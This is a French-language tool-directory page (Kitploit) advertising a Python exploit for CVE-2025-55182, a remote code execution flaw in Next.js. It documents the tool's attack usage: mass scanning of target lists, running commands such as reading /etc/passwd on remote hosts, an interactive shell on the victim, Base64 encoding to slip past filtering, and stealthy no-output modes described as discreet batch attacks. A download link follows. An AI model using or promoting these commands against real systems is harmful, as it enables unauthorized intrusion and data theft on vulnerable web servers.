Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-55182-EXP — Exploit Python pour CVE-2025-55182 (RCE Next.js) avec scan de cibles unique ou par lots, exécution de commandes, shell interactif et 4 modes d'attaque avec prise en charge du codage Base64. | Kitploit
Outils/GitHubGitHub/lc-pro/cve-2025-55182-exp
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHublc-pro/cve-2025-55182-exp

CVE-2025-55182-EXP

Exploit Python pour CVE-2025-55182 (RCE Next.js) avec scan de cibles unique ou par lots, exécution de commandes, shell interactif et 4 modes d'attaque avec prise en charge du codage Base64.

Voir le dépôt
24il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Outil d'exploitation CVE-2025-55182

Présentation de l'outil

Cet outil permet de détecter et d'exploiter la vulnérabilité CVE-2025-55182 (supposée être une vulnérabilité d'exécution de code dans le framework Next.js ou associé). Il prend en charge la détection par lots sur cible unique/multiple, l'exécution de commandes, un shell interactif, etc., avec 4 modes d'attaque adaptés à différents scénarios, et propose des configurations flexibles comme l'encodage Base64 des commandes, le proxy, la journalisation.

Description de la vulnérabilité

La vulnérabilité CVE-2025-55182 pourrait exister dans des applications basées sur Next.js. Elle permet, par la construction de requêtes malveillantes, de modifier la logique d'exécution de _response, d'injecter un appel au module child_process et d'obtenir une exécution de commande à distance (RCE). L'outil envoie des données de formulaire spécialement conçues pour déclencher la vulnérabilité et renvoyer le résultat de la commande exécutée.

Prérequis

  • Python 3.7+
  • Bibliothèque : requests
  • Installation des dépendances :
    • pip install requests
      

Utilisation de base

1. Exécution de commande sur une cible unique (mode d'attaque par défaut)

# Exécuter la commande whoami (mode d'attaque 1 : avec réponse)
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami"

# Exécuter une commande système (encodage Base64 pour éviter l'interception de caractères spéciaux)
python CVE-2025-55182-exploit.py -u https://target.com -c "cat /etc/passwd" -b

# Mode réponse complète (décodage Base64 du résultat)
python CVE-2025-55182-exploit.py -u https://target.com -c "ipconfig" -p 4

2. Détection par lots sur plusieurs cibles

# Lire les URL cibles depuis un fichier, exécuter la commande id en masse (20 threads)
python CVE-2025-55182-exploit.py -l targets.txt -c "id" -t 20 -o result.log

3. Mode shell interactif

# Se connecter à la cible et entrer dans une ligne de commande interactive (prise en charge du basculement Base64)
python CVE-2025-55182-exploit.py -u https://target.com -s

4. Mode proxy (capture/transfert de trafic)

# Utiliser le proxy Burp Suite pour analyser le trafic
python CVE-2025-55182-exploit.py -u https://target.com -c "whoami" --proxy http://127.0.0.1:8080

Description des paramètres

ParamètreAbrégéObligatoireDescriptionExemple
--url-uNonURL cible unique (à choisir avec -l ; priorité à -u si les deux sont fournis)-u https://target.com
--url-list-lNonFichier contenant la liste des URL cibles (une URL par ligne, sans protocole autorisé, complétée automatiquement en http/https)-l urls.txt
--payload-pNonMode d'attaque (par défaut : 1)
1=réponse (execSync)
2=pas de réponse (execSync)
3=pas de réponse (exec)
--cmd-cNonCommande système à exécuter (obligatoire en mode batch ou cible unique ; mutuellement exclusif avec -s)-c "whoami" ou -c "dir"
--threads-tNonNombre de threads pour la détection par lots (par défaut : 10, conseillé ≤ 50)-t 20
--outlog-oNonFichier de journalisation (par défaut : cve-2025-55182.log)-o exploit.log
--base64-bNonEncode la commande spécifiée par -c en Base64 (évite l'interception de caractères spéciaux)-c "cat /etc/passwd" -b
--cmd-shell-sNonMode shell interactif (uniquement pour cible unique avec -u ; mutuellement exclusif avec -c)-u https://target.com -s
--proxy-NonConfiguration proxy (prend en charge les proxies HTTP/HTTPS, pour la capture ou le transfert de trafic)--proxy http://127.0.0.1:8080
--skip-check-NonIgnorer la vérification de connectivité du proxy (vérification de disponibilité du proxy par défaut)--proxy http://127.0.0.1:8080 --skip-check
--time-out-NonDélai d'expiration de la requête (en secondes, par défaut : 10)--time-out 15

Détails des modes d'attaque

Numéro du modeDescription du modeCaractéristiquesScénario d'utilisation
1Réponse (execSync)Exécution synchrone de la commande, retourne une redirection 303, le résultat est inclus dans l'en-tête de réponseVérification rapide de la présence de la vulnérabilité
2Pas de réponse (execSync)Exécution synchrone de la commande, aucun résultat renvoyé (doit être confirmé par d'autres moyens)Exécution discrète
3Pas de réponse (exec)Exécution asynchrone de la commande, aucun résultat renvoyé (peu de traces, adapté aux opérations sans confirmation)Attaque par lots discrète
4Réponse complèteExécution synchrone de la commande, résultat encodé en Base64 renvoyé dans le corps de la réponse (décodé automatiquement par l'outil)Scénario nécessitant la sortie complète de la commande

Commandes du shell interactif

En mode -s, les commandes intégrées suivantes sont disponibles :

CommandeDescription
b64Passer en mode commande encodée Base64
nob64Quitter le mode encodage Base64
exitQuitter le shell interactif
?Afficher l'aide

Description de la sortie

  1. Sortie console : contient l'heure d'exécution, l'URL cible, le code de statut de la réponse, le résultat de la commande, etc. ;
  2. Fichier de journal : tous les enregistrements d'exécution (succès/échec) sont automatiquement écrits dans le fichier spécifié par --outlog, facilitant l'analyse ultérieure ;
  3. Liste des succès : après la fin de la détection par lots, les cibles vulnérables (code de statut 303/500) sont automatiquement résumées.

Précautions d'emploi

Télécharger l’outil